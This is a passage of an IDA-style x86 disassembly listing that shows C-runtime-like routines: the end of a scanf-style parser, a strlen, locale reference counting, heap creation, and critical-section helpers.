loc_419A0F: ; CODE XREF: sub_4192C5+73B�j
; sub_4192C5+745�j
push 78h
jmp short loc_4199CE
; ---------------------------------------------------------------------------
loc_419A13: ; CODE XREF: sub_4192C5+64E�j
mov [ebx], al
inc ebx
loc_419A16: ; CODE XREF: sub_4192C5+6A3�j
mov [ebp+var_64], ebx
jmp loc_419891
; ---------------------------------------------------------------------------
loc_419A1E: ; CODE XREF: sub_4192C5+644�j
inc esi
jmp loc_419891
; ---------------------------------------------------------------------------
loc_419A24: ; CODE XREF: sub_4192C5+5F1�j
; sub_4192C5+613�j ...
dec [ebp+var_30]
cmp eax, 0FFFFFFFFh
jz short loc_419A37
push [ebp+arg_0]
push eax
call sub_41E78C
pop ecx
pop ecx
loc_419A37: ; CODE XREF: sub_4192C5+5DA�j
; sub_4192C5+765�j
cmp esi, ebx
jz loc_419D32
cmp [ebp+var_4B], 0
jnz loc_419CA6
inc [ebp+var_34]
cmp [ebp+var_68], 63h
jz loc_419CA6
mov eax, [ebp+var_64]
cmp [ebp+var_4D], 0
jz short loc_419A68
and word ptr [eax], 0
jmp loc_419CA6
; ---------------------------------------------------------------------------
loc_419A68: ; CODE XREF: sub_4192C5+798�j
and byte ptr [eax], 0
jmp loc_419CA6
; ---------------------------------------------------------------------------
loc_419A70: ; CODE XREF: sub_4192C5+441�j
mov [ebp+var_4F], 1
loc_419A74: ; CODE XREF: sub_4192C5+221�j
; sub_4192C5+233�j ...
mov ebx, [ebp+var_28]
cmp ebx, 2Dh
jnz short loc_419A82
mov [ebp+var_4A], 1
jmp short loc_419A87
; ---------------------------------------------------------------------------
loc_419A82: ; CODE XREF: sub_4192C5+7B5�j
cmp ebx, 2Bh
jnz short loc_419AA5
loc_419A87: ; CODE XREF: sub_4192C5+7BB�j
dec [ebp+var_48]
jnz short loc_419A96
test ecx, ecx
jz short loc_419A96
mov [ebp+var_4C], 1
jmp short loc_419AA5
; ---------------------------------------------------------------------------
loc_419A96: ; CODE XREF: sub_4192C5+7C5�j
; sub_4192C5+7C9�j
inc [ebp+var_30]
mov edx, esi
call sub_4192AF
mov ebx, eax
loc_419AA2: ; CODE XREF: sub_4192C5+723�j
mov [ebp+var_28], ebx
loc_419AA5: ; CODE XREF: sub_4192C5+6CE�j
; sub_4192C5+70A�j ...
cmp [ebp+var_54], 0
jz loc_419BAA
cmp [ebp+var_4C], 0
jnz loc_419B88
loc_419AB9: ; CODE XREF: sub_4192C5+8BA�j
cmp edi, 78h
jz short loc_419B04
cmp edi, 70h
jz short loc_419B04
push ebx
call sub_41E6D9
pop ecx
test eax, eax
jz short loc_419B35
cmp edi, 6Fh
jnz short loc_419AED
cmp ebx, 38h
jge short loc_419B35
mov eax, [ebp+var_5C]
mov ecx, [ebp+var_58]
shld ecx, eax, 3
shl eax, 3
mov [ebp+var_5C], eax
mov [ebp+var_58], ecx
jmp short loc_419B38
; ---------------------------------------------------------------------------
loc_419AED: ; CODE XREF: sub_4192C5+80C�j
push 0
push 0Ah
push [ebp+var_58]
push [ebp+var_5C]
call sub_417220
mov [ebp+var_5C], eax
mov [ebp+var_58], edx
jmp short loc_419B38
; ---------------------------------------------------------------------------
loc_419B04: ; CODE XREF: sub_4192C5+7F7�j
; sub_4192C5+7FC�j
push ebx
call sub_41E713
pop ecx
test eax, eax
jz short loc_419B35
mov eax, [ebp+var_5C]
mov ecx, [ebp+var_58]
shld ecx, eax, 4
shl eax, 4
mov [ebp+var_5C], eax
mov [ebp+var_58], ecx
push ebx
call sub_41E6D9
pop ecx
test eax, eax
jnz short loc_419B38
and ebx, 0FFFFFFDFh
sub ebx, 7
jmp short loc_419B38
; ---------------------------------------------------------------------------
loc_419B35: ; CODE XREF: sub_4192C5+807�j
; sub_4192C5+811�j ...
inc [ebp+var_4C]
loc_419B38: ; CODE XREF: sub_4192C5+826�j
; sub_4192C5+83D�j ...
cmp [ebp+var_4C], 0
jnz short loc_419B6A
inc [ebp+var_40]
lea eax, [ebx-30h]
cdq
add [ebp+var_5C], eax
adc [ebp+var_58], edx
cmp [ebp+var_44], 0
jz short loc_419B5C
dec [ebp+var_48]
jnz short loc_419B5C
mov [ebp+var_4C], 1
jmp short loc_419B7B
; ---------------------------------------------------------------------------
loc_419B5C: ; CODE XREF: sub_4192C5+88A�j
; sub_4192C5+88F�j
inc [ebp+var_30]
mov edx, esi
call sub_4192AF
mov ebx, eax
jmp short loc_419B7B
; ---------------------------------------------------------------------------
loc_419B6A: ; CODE XREF: sub_4192C5+877�j
dec [ebp+var_30]
cmp ebx, 0FFFFFFFFh
jz short loc_419B7B
push esi
push ebx
call sub_41E78C
pop ecx
pop ecx
loc_419B7B: ; CODE XREF: sub_4192C5+895�j
; sub_4192C5+8A3�j ...
cmp [ebp+var_4C], 0
jz loc_419AB9
mov [ebp+var_28], ebx
loc_419B88: ; CODE XREF: sub_4192C5+7EE�j
cmp [ebp+var_4A], 0
jz loc_419C64
mov eax, [ebp+var_5C]
neg eax
mov ecx, [ebp+var_58]
adc ecx, 0
neg ecx
mov [ebp+var_5C], eax
mov [ebp+var_58], ecx
jmp loc_419C64
; ---------------------------------------------------------------------------
loc_419BAA: ; CODE XREF: sub_4192C5+7E4�j
cmp [ebp+var_4C], 0
jnz loc_419C5B
loc_419BB4: ; CODE XREF: sub_4192C5+98D�j
cmp edi, 78h
jz short loc_419BE6
cmp edi, 70h
jz short loc_419BE6
push ebx
call sub_41E6D9
pop ecx
test eax, eax
jz short loc_419C08
cmp edi, 6Fh
jnz short loc_419BD9
cmp ebx, 38h
jge short loc_419C08
shl [ebp+var_38], 3
jmp short loc_419C0B
; ---------------------------------------------------------------------------
loc_419BD9: ; CODE XREF: sub_4192C5+907�j
mov eax, [ebp+var_38]
lea eax, [eax+eax*4]
shl eax, 1
mov [ebp+var_38], eax
jmp short loc_419C0B
; ---------------------------------------------------------------------------
loc_419BE6: ; CODE XREF: sub_4192C5+8F2�j
; sub_4192C5+8F7�j
push ebx
call sub_41E713
pop ecx
test eax, eax
jz short loc_419C08
shl [ebp+var_38], 4
push ebx
call sub_41E6D9
pop ecx
test eax, eax
jnz short loc_419C0B
and ebx, 0FFFFFFDFh
sub ebx, 7
jmp short loc_419C0B
; ---------------------------------------------------------------------------
loc_419C08: ; CODE XREF: sub_4192C5+902�j
; sub_4192C5+90C�j ...
inc [ebp+var_4C]
loc_419C0B: ; CODE XREF: sub_4192C5+912�j
; sub_4192C5+91F�j ...
cmp [ebp+var_4C], 0
jnz short loc_419C3D
inc [ebp+var_40]
mov eax, [ebp+var_38]
lea eax, [eax+ebx-30h]
mov [ebp+var_38], eax
cmp [ebp+var_44], 0
jz short loc_419C2F
dec [ebp+var_48]
jnz short loc_419C2F
mov [ebp+var_4C], 1
jmp short loc_419C4E
; ---------------------------------------------------------------------------
loc_419C2F: ; CODE XREF: sub_4192C5+95D�j
; sub_4192C5+962�j
inc [ebp+var_30]
mov edx, esi
call sub_4192AF
mov ebx, eax
jmp short loc_419C4E
; ---------------------------------------------------------------------------
loc_419C3D: ; CODE XREF: sub_4192C5+94A�j
dec [ebp+var_30]
cmp ebx, 0FFFFFFFFh
jz short loc_419C4E
push esi
push ebx
call sub_41E78C
pop ecx
pop ecx
loc_419C4E: ; CODE XREF: sub_4192C5+968�j
; sub_4192C5+976�j ...
cmp [ebp+var_4C], 0
jz loc_419BB4
mov [ebp+var_28], ebx
loc_419C5B: ; CODE XREF: sub_4192C5+8E9�j
cmp [ebp+var_4A], 0
jz short loc_419C64
neg [ebp+var_38]
loc_419C64: ; CODE XREF: sub_4192C5+8C7�j
; sub_4192C5+8E0�j ...
cmp edi, 46h
jnz short loc_419C6D
and [ebp+var_40], 0
loc_419C6D: ; CODE XREF: sub_4192C5+9A2�j
cmp [ebp+var_40], 0
jz loc_419D32
cmp [ebp+var_4B], 0
jnz short loc_419CA6
inc [ebp+var_34]
mov ebx, [ebp+var_64]
mov eax, [ebp+var_38]
loc_419C86: ; CODE XREF: sub_4192C5+259�j
cmp [ebp+var_54], 0
jz short loc_419C99
mov eax, [ebp+var_5C]
mov [ebx], eax
mov eax, [ebp+var_58]
mov [ebx+4], eax
jmp short loc_419CA6
; ---------------------------------------------------------------------------
loc_419C99: ; CODE XREF: sub_4192C5+9C5�j
cmp [ebp+var_4F], 0
jz short loc_419CA3
mov [ebx], eax
jmp short loc_419CA6
; ---------------------------------------------------------------------------
loc_419CA3: ; CODE XREF: sub_4192C5+9D8�j
mov [ebx], ax
loc_419CA6: ; CODE XREF: sub_4192C5+25F�j
; sub_4192C5+3F1�j ...
inc [ebp+var_29]
inc [ebp+arg_4]
jmp short loc_419D16
; ---------------------------------------------------------------------------
loc_419CAE: ; CODE XREF: sub_4192C5+90�j
inc [ebp+var_30]
mov edx, [ebp+arg_0]
call sub_4192AF
mov ebx, eax
mov [ebp+var_28], ebx
movzx eax, byte ptr [esi]
inc esi
mov [ebp+arg_4], esi
cmp eax, ebx
jnz short loc_419CFF
movzx eax, bl
mov ecx, off_432A60
test byte ptr [ecx+eax*2+1], 80h
jz short loc_419D16
inc [ebp+var_30]
mov edx, [ebp+arg_0]
call sub_4192AF
movzx ecx, byte ptr [esi]
inc esi
mov [ebp+arg_4], esi
cmp ecx, eax
jz short loc_419D13
cmp eax, 0FFFFFFFFh
jz short loc_419CFF
push [ebp+arg_0]
push eax
call sub_41E78C
pop ecx
pop ecx
loc_419CFF: ; CODE XREF: sub_4192C5+A02�j
; sub_4192C5+A2D�j
cmp ebx, 0FFFFFFFFh
loc_419D02: ; CODE XREF: sub_4192C5+471�j
jz short loc_419D32
push [ebp+arg_0]
push [ebp+var_28]
call sub_41E78C
pop ecx
pop ecx
jmp short loc_419D32
; ---------------------------------------------------------------------------
loc_419D13: ; CODE XREF: sub_4192C5+A28�j
dec [ebp+var_30]
loc_419D16: ; CODE XREF: sub_4192C5+9E7�j
; sub_4192C5+A12�j
cmp [ebp+var_28], 0FFFFFFFFh
jnz loc_4192F3
mov eax, [ebp+arg_4]
cmp byte ptr [eax], 25h
jnz short loc_419D32
cmp byte ptr [eax+1], 6Eh
jz loc_4192F3
loc_419D32: ; CODE XREF: sub_4192C5+35�j
; sub_4192C5+3E7�j ...
cmp [ebp+var_24], 1
jnz short loc_419D41
push [ebp+var_20]
call sub_416D07
pop ecx
loc_419D41: ; CODE XREF: sub_4192C5+A71�j
mov eax, [ebp+var_34]
cmp [ebp+var_28], 0FFFFFFFFh
jnz short loc_419D56
test eax, eax
jnz short loc_419D56
cmp [ebp+var_29], al
jnz short loc_419D56
or eax, 0FFFFFFFFh
loc_419D56: ; CODE XREF: sub_4192C5+A83�j
; sub_4192C5+A87�j ...
lea esp, [ebp-1E4h]
mov ecx, [ebp+var_1C]
xor ecx, [ebp+4]
call sub_41C596
call __SEH_epilog
retn
sub_4192C5 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_419D70 proc near ; CODE XREF: sub_416B53+17�p
; sub_417F54+D2�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
test ecx, 3
jz short loc_419DA0
loc_419D7C: ; CODE XREF: sub_419D70+1B�j
mov al, [ecx]
add ecx, 1
test al, al
jz short loc_419DD3
test ecx, 3
jnz short loc_419D7C
add eax, 0
lea esp, [esp+0]
lea esp, [esp+0]
loc_419DA0: ; CODE XREF: sub_419D70+A�j
; sub_419D70+46�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_419DA0
mov eax, [ecx-4]
test al, al
jz short loc_419DF1
test ah, ah
jz short loc_419DE7
test eax, 0FF0000h
jz short loc_419DDD
test eax, 0FF000000h
jz short loc_419DD3
jmp short loc_419DA0
; ---------------------------------------------------------------------------
loc_419DD3: ; CODE XREF: sub_419D70+13�j
; sub_419D70+5F�j
lea eax, [ecx-1]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_419DDD: ; CODE XREF: sub_419D70+58�j
lea eax, [ecx-2]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_419DE7: ; CODE XREF: sub_419D70+51�j
lea eax, [ecx-3]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_419DF1: ; CODE XREF: sub_419D70+4D�j
lea eax, [ecx-4]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
sub_419D70 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419DFB proc near ; CODE XREF: sub_416C7A+2A�p
; sub_4175DA+37�p ...
var_4 = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_4]
lea ecx, [eax+1]
cmp ecx, 100h
mov ecx, [ebp+arg_0]
ja short loc_419E19
mov ecx, [ecx+48h]
movzx eax, word ptr [ecx+eax*2]
jmp short loc_419E6D
; ---------------------------------------------------------------------------
loc_419E19: ; CODE XREF: sub_419DFB+13�j
push esi
mov edx, eax
sar edx, 8
push edi
mov edi, [ecx+48h]
movzx esi, dl
test byte ptr [edi+esi*2+1], 80h
pop edi
pop esi
jz short loc_419E3E
and [ebp+var_2], 0
push 2
mov [ebp+var_3], al
mov [ebp+var_4], dl
pop eax
jmp short loc_419E48
; ---------------------------------------------------------------------------
loc_419E3E: ; CODE XREF: sub_419DFB+32�j
and [ebp+var_3], 0
mov [ebp+var_4], al
xor eax, eax
inc eax
loc_419E48: ; CODE XREF: sub_419DFB+41�j
push 1
push dword ptr [ecx+14h]
push dword ptr [ecx+4]
lea ecx, [ebp+arg_4+2]
push ecx
push eax
lea eax, [ebp+var_4]
push eax
push 1
call sub_41E950
add esp, 1Ch
test eax, eax
jnz short loc_419E69
leave
retn
; ---------------------------------------------------------------------------
loc_419E69: ; CODE XREF: sub_419DFB+6A�j
movzx eax, word ptr [ebp+arg_4+2]
loc_419E6D: ; CODE XREF: sub_419DFB+1C�j
and eax, [ebp+arg_8]
leave
retn
sub_419DFB endp
; =============== S U B R O U T I N E =======================================
sub_419E72 proc near ; CODE XREF: sub_419F3C+B7�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+3Ch]
push edi
xor edi, edi
cmp eax, dword_481468
jz short loc_419EE8
cmp eax, edi
jz short loc_419EE8
mov eax, [esi+2Ch]
cmp [eax], edi
jnz short loc_419EE8
mov eax, [esi+34h]
cmp eax, edi
jz short loc_419EB3
cmp [eax], edi
jnz short loc_419EB3
cmp eax, dword_4815E8
jz short loc_419EB3
push eax
call sub_416D07
push dword ptr [esi+3Ch]
call sub_41ECF9
pop ecx
pop ecx
loc_419EB3: ; CODE XREF: sub_419E72+23�j
; sub_419E72+27�j ...
mov eax, [esi+30h]
cmp eax, edi
jz short loc_419ED6
cmp [eax], edi
jnz short loc_419ED6
cmp eax, dword_4815EC
jz short loc_419ED6
push eax
call sub_416D07
push dword ptr [esi+3Ch]
call sub_41EC9A
pop ecx
pop ecx
loc_419ED6: ; CODE XREF: sub_419E72+46�j
; sub_419E72+4A�j ...
push dword ptr [esi+2Ch]
call sub_416D07
push dword ptr [esi+3Ch]
call sub_416D07
pop ecx
pop ecx
loc_419EE8: ; CODE XREF: sub_419E72+11�j
; sub_419E72+15�j ...
mov eax, [esi+40h]
cmp eax, dword_4815E4
jz short loc_419F0B
cmp eax, edi
jz short loc_419F0B
cmp [eax], edi
jnz short loc_419F0B
push eax
call sub_416D07
push dword ptr [esi+44h]
call sub_416D07
pop ecx
pop ecx
loc_419F0B: ; CODE XREF: sub_419E72+7F�j
; sub_419E72+83�j ...
mov eax, [esi+50h]
cmp eax, dword_481464
jz short loc_419F32
cmp eax, edi
jz short loc_419F32
cmp [eax+0B4h], edi
jnz short loc_419F32
push eax
call sub_41EB0A
push dword ptr [esi+50h]
call sub_416D07
pop ecx
pop ecx
loc_419F32: ; CODE XREF: sub_419E72+A2�j
; sub_419E72+A6�j ...
push esi
call sub_416D07
pop ecx
pop edi
pop esi
retn
sub_419E72 endp
; =============== S U B R O U T I N E =======================================
sub_419F3C proc near ; CODE XREF: sub_419FFE+18�p
push esi
call sub_4191CF
mov esi, eax
mov eax, [esi+64h]
cmp eax, off_4323FC
jz loc_419FF9
test eax, eax
jz short loc_419F86
mov ecx, [eax+2Ch]
dec dword ptr [eax]
test ecx, ecx
jz short loc_419F62
dec dword ptr [ecx]
loc_419F62: ; CODE XREF: sub_419F3C+22�j
mov ecx, [eax+34h]
test ecx, ecx
jz short loc_419F6B
dec dword ptr [ecx]
loc_419F6B: ; CODE XREF: sub_419F3C+2B�j
mov ecx, [eax+30h]
test ecx, ecx
jz short loc_419F74
dec dword ptr [ecx]
loc_419F74: ; CODE XREF: sub_419F3C+34�j
mov ecx, [eax+40h]
test ecx, ecx
jz short loc_419F7D
dec dword ptr [ecx]
loc_419F7D: ; CODE XREF: sub_419F3C+3D�j
mov ecx, [eax+4Ch]
dec dword ptr [ecx+0B4h]
loc_419F86: ; CODE XREF: sub_419F3C+19�j
mov ecx, off_4323FC
mov [esi+64h], ecx
mov ecx, off_4323FC
inc dword ptr [ecx]
mov ecx, off_4323FC
mov ecx, [ecx+2Ch]
test ecx, ecx
jz short loc_419FA6
inc dword ptr [ecx]
loc_419FA6: ; CODE XREF: sub_419F3C+66�j
mov ecx, off_4323FC
mov ecx, [ecx+34h]
test ecx, ecx
jz short loc_419FB5
inc dword ptr [ecx]
loc_419FB5: ; CODE XREF: sub_419F3C+75�j
mov ecx, off_4323FC
mov ecx, [ecx+30h]
test ecx, ecx
jz short loc_419FC4
inc dword ptr [ecx]
loc_419FC4: ; CODE XREF: sub_419F3C+84�j
mov ecx, off_4323FC
mov ecx, [ecx+40h]
test ecx, ecx
jz short loc_419FD3
inc dword ptr [ecx]
loc_419FD3: ; CODE XREF: sub_419F3C+93�j
mov ecx, off_4323FC
mov ecx, [ecx+4Ch]
inc dword ptr [ecx+0B4h]
test eax, eax
jz short loc_419FF9
cmp dword ptr [eax], 0
jnz short loc_419FF9
cmp eax, offset dword_4323A8
jz short loc_419FF9
push eax
call sub_419E72
pop ecx
loc_419FF9: ; CODE XREF: sub_419F3C+11�j
; sub_419F3C+A8�j ...
mov eax, [esi+64h]
pop esi
retn
sub_419F3C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419FFE proc near ; CODE XREF: sub_416C7A+12�p
; sub_4174C6+24�p ...
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 0Ch
push offset stru_42C0A0
call __SEH_prolog
push 0Ch
call sub_41A1D6
pop ecx
and [ebp+ms_exc.disabled], 0
call sub_419F3C
mov [ebp+var_1C], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41A030
mov eax, [ebp+var_1C]
call __SEH_epilog
retn
sub_419FFE endp
; =============== S U B R O U T I N E =======================================
sub_41A030 proc near ; CODE XREF: sub_419FFE+24�p
; DATA XREF: .text:stru_42C0A0�o
push 0Ch
call sub_41A142
pop ecx
retn
sub_41A030 endp
; =============== S U B R O U T I N E =======================================
sub_41A039 proc near ; CODE XREF: sub_41A053+20�p
cmp dword_481184, 2
jnz short loc_41A04F
cmp dword_481190, 5
jb short loc_41A04F
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_41A04F: ; CODE XREF: sub_41A039+7�j
; sub_41A039+10�j
push 3
pop eax
retn
sub_41A039 endp
; =============== S U B R O U T I N E =======================================
sub_41A053 proc near ; CODE XREF: .text:0041876C�p
arg_0 = dword ptr 4
xor eax, eax
cmp [esp+arg_0], eax
push 0
setz al
push 1000h
push eax
call dword_42218C ; HeapCreate
test eax, eax
mov dword_482980, eax
jz short loc_41A09D
call sub_41A039
cmp eax, 3
mov dword_482984, eax
jnz short loc_41A0A0
push 3F8h
call sub_41A207
test eax, eax
pop ecx
jnz short loc_41A0A0
push dword_482980
call dword_422188 ; HeapDestroy
loc_41A09D: ; CODE XREF: sub_41A053+1E�j
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41A0A0: ; CODE XREF: sub_41A053+2D�j
; sub_41A053+3C�j
xor eax, eax
inc eax
retn
sub_41A053 endp
; =============== S U B R O U T I N E =======================================
sub_41A0A4 proc near ; CODE XREF: sub_419240�p
push esi
push edi
xor esi, esi
mov edi, offset dword_4811E0
loc_41A0AD: ; CODE XREF: sub_41A0A4+35�j
cmp dword_43253C[esi*8], 1
jnz short loc_41A0D5
lea eax, ds:432538h[esi*8]
mov [eax], edi
push 0FA0h
push dword ptr [eax]
add edi, 18h
call sub_41EFD0
test eax, eax
pop ecx
pop ecx
jz short loc_41A0E1
loc_41A0D5: ; CODE XREF: sub_41A0A4+11�j
inc esi
cmp esi, 24h
jl short loc_41A0AD
xor eax, eax
inc eax
loc_41A0DE: ; CODE XREF: sub_41A0A4+47�j
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_41A0E1: ; CODE XREF: sub_41A0A4+2F�j
and off_432538[esi*8], 0
xor eax, eax
jmp short loc_41A0DE
sub_41A0A4 endp
; =============== S U B R O U T I N E =======================================
sub_41A0ED proc near ; CODE XREF: sub_4191B1�p
push ebx
mov ebx, dword_422024
push esi
mov esi, offset off_432538
push edi
loc_41A0FB: ; CODE XREF: sub_41A0ED+30�j
mov edi, [esi]
test edi, edi
jz short loc_41A114
cmp dword ptr [esi+4], 1
jz short loc_41A114
push edi
call ebx ; RtlDeleteCriticalSection
push edi
call sub_416D07
and dword ptr [esi], 0
pop ecx
loc_41A114: ; CODE XREF: sub_41A0ED+12�j
; sub_41A0ED+18�j
add esi, 8
cmp esi, offset off_432658
jl short loc_41A0FB
mov esi, offset off_432538
pop edi
loc_41A125: ; CODE XREF: sub_41A0ED+50�j
mov eax, [esi]
test eax, eax
jz short loc_41A134
cmp dword ptr [esi+4], 1
jnz short loc_41A134
push eax
call ebx ; RtlDeleteCriticalSection
loc_41A134: ; CODE XREF: sub_41A0ED+3C�j
; sub_41A0ED+42�j
add esi, 8
cmp esi, offset off_432658
jl short loc_41A125
pop esi
pop ebx
retn
sub_41A0ED endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A142 proc near ; CODE XREF: sub_416D5A+2�p
; sub_416DEA+2�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
push off_432538[eax*8]
call dword_422018 ; RtlLeaveCriticalSection
pop ebp
retn
sub_41A142 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A157 proc near ; CODE XREF: sub_41A1D6+14�p
; sub_41BA2A+4F�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
lea esi, ds:432538h[esi*8]
cmp dword ptr [esi], 0
jz short loc_41A16F
xor eax, eax
inc eax
jmp short loc_41A1D3
; ---------------------------------------------------------------------------
loc_41A16F: ; CODE XREF: sub_41A157+11�j
push edi
push 18h
call sub_416E1F
mov edi, eax
test edi, edi
pop ecx
jnz short loc_41A18D
loc_41A17E: ; CODE XREF: sub_41A157+63�j
call sub_41B9A5
mov dword ptr [eax], 0Ch
xor eax, eax
jmp short loc_41A1D2
; ---------------------------------------------------------------------------
loc_41A18D: ; CODE XREF: sub_41A157+25�j
push 0Ah
call sub_41A1D6
cmp dword ptr [esi], 0
pop ecx
jnz short loc_41A1C0
push 0FA0h
push edi
call sub_41EFD0
test eax, eax
pop ecx
pop ecx
jnz short loc_41A1BC
push edi
call sub_416D07
push 0Ah
call sub_41A142
pop ecx
pop ecx
jmp short loc_41A17E
; ---------------------------------------------------------------------------
loc_41A1BC: ; CODE XREF: sub_41A157+52�j
mov [esi], edi
jmp short loc_41A1C7
; ---------------------------------------------------------------------------
loc_41A1C0: ; CODE XREF: sub_41A157+41�j
push edi
call sub_416D07
pop ecx
loc_41A1C7: ; CODE XREF: sub_41A157+67�j
push 0Ah
call sub_41A142
xor eax, eax
pop ecx
inc eax
loc_41A1D2: ; CODE XREF: sub_41A157+34�j
pop edi
loc_41A1D3: ; CODE XREF: sub_41A157+16�j
pop esi
pop ebp
retn
sub_41A157 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A1D6 proc near ; CODE XREF: sub_416D07+1E�p
; sub_416D78+22�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
push esi
lea esi, ds:432538h[eax*8]
cmp dword ptr [esi], 0
jnz short loc_41A1FC
push eax
call sub_41A157
test eax, eax
pop ecx
jnz short loc_41A1FC
push 11h
call sub_41865A
pop ecx
loc_41A1FC: ; CODE XREF: sub_41A1D6+11�j
; sub_41A1D6+1C�j
push dword ptr [esi]
call dword_42201C ; RtlEnterCriticalSection
pop esi
pop ebp
retn
sub_41A1D6 endp
; =============== S U B R O U T I N E =======================================
sub_41A207 proc near ; CODE XREF: sub_41A053+34�p
arg_0 = dword ptr 4
push 140h
push 0
push dword_482980
call dword_42205C ; RtlAllocateHeap
test eax, eax
mov dword_48296C, eax
jnz short loc_41A224
retn
; ---------------------------------------------------------------------------
loc_41A224: ; CODE XREF: sub_41A207+1A�j
mov ecx, [esp+arg_0]
and dword_482964, 0
and dword_482968, 0
mov dword_482974, eax
xor eax, eax
mov dword_482970, ecx
mov dword_482978, 10h
inc eax
retn
sub_41A207 endp
; =============== S U B R O U T I N E =======================================
sub_41A24F proc near ; CODE XREF: sub_416D07+29�p
; sub_417003+5B�p ...
arg_0 = dword ptr 4
mov eax, dword_482968
lea ecx, [eax+eax*4]
mov eax, dword_48296C
lea ecx, [eax+ecx*4]
jmp short loc_41A273
; ---------------------------------------------------------------------------
loc_41A261: ; CODE XREF: sub_41A24F+26�j
mov edx, [esp+arg_0]
sub edx, [eax+0Ch]
cmp edx, 100000h
jb short locret_41A279
add eax, 14h
loc_41A273: ; CODE XREF: sub_41A24F+10�j
cmp eax, ecx
jb short loc_41A261
xor eax, eax
locret_41A279: ; CODE XREF: sub_41A24F+1F�j
retn
sub_41A24F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A27A proc near ; CODE XREF: sub_416D07+38�p
; sub_417003+B8�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
mov ecx, [ebp+arg_0]
mov eax, [ecx+10h]
push esi
mov esi, [ebp+arg_4]
push edi
mov edi, esi
sub edi, [ecx+0Ch]
add esi, 0FFFFFFFCh
shr edi, 0Fh
mov ecx, edi
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_10], ecx
mov ecx, [esi]
dec ecx
test cl, 1
mov [ebp+var_4], ecx
jnz loc_41A58E
push ebx
lea ebx, [ecx+esi]
mov edx, [ebx]
mov [ebp+var_C], edx
mov edx, [esi-4]
mov [ebp+var_8], edx
mov edx, [ebp+var_C]
test dl, 1
mov [ebp+arg_4], ebx
jnz short loc_41A345
sar edx, 4
dec edx
cmp edx, 3Fh
jbe short loc_41A2DD
push 3Fh
pop edx
loc_41A2DD: ; CODE XREF: sub_41A27A+5E�j
mov ecx, [ebx+4]
cmp ecx, [ebx+8]
jnz short loc_41A327
cmp edx, 20h
mov ebx, 80000000h
jnb short loc_41A308
mov ecx, edx
shr ebx, cl
lea ecx, [edx+eax+4]
not ebx
and [eax+edi*4+44h], ebx
dec byte ptr [ecx]
jnz short loc_41A324
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_41A324
; ---------------------------------------------------------------------------
loc_41A308: ; CODE XREF: sub_41A27A+73�j
lea ecx, [edx-20h]
shr ebx, cl
lea ecx, [edx+eax+4]
not ebx
and [eax+edi*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_41A324
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_41A324: ; CODE XREF: sub_41A27A+85�j
; sub_41A27A+8C�j ...
mov ebx, [ebp+arg_4]
loc_41A327: ; CODE XREF: sub_41A27A+69�j
mov edx, [ebx+8]
mov ebx, [ebx+4]
mov ecx, [ebp+var_4]
add ecx, [ebp+var_C]
mov [edx+4], ebx
mov edx, [ebp+arg_4]
mov ebx, [edx+4]
mov edx, [edx+8]
mov [ebx+8], edx
mov [ebp+var_4], ecx
loc_41A345: ; CODE XREF: sub_41A27A+55�j
mov edx, ecx
sar edx, 4
dec edx
cmp edx, 3Fh
jbe short loc_41A353
push 3Fh
pop edx
loc_41A353: ; CODE XREF: sub_41A27A+D4�j
mov ebx, [ebp+var_8]
and ebx, 1
mov [ebp+var_C], ebx
jnz loc_41A3F1
sub esi, [ebp+var_8]
mov ebx, [ebp+var_8]
sar ebx, 4
push 3Fh
mov [ebp+arg_4], esi
dec ebx
pop esi
cmp ebx, esi
jbe short loc_41A378
mov ebx, esi
loc_41A378: ; CODE XREF: sub_41A27A+FA�j
add ecx, [ebp+var_8]
mov edx, ecx
sar edx, 4
dec edx
cmp edx, esi
mov [ebp+var_4], ecx
jbe short loc_41A38A
mov edx, esi
loc_41A38A: ; CODE XREF: sub_41A27A+10C�j
cmp ebx, edx
jz short loc_41A3EC
mov ecx, [ebp+arg_4]
mov esi, [ecx+4]
cmp esi, [ecx+8]
jnz short loc_41A3D4
cmp ebx, 20h
mov esi, 80000000h
jnb short loc_41A3BA
mov ecx, ebx
shr esi, cl
not esi
and [eax+edi*4+44h], esi
dec byte ptr [ebx+eax+4]
jnz short loc_41A3D4
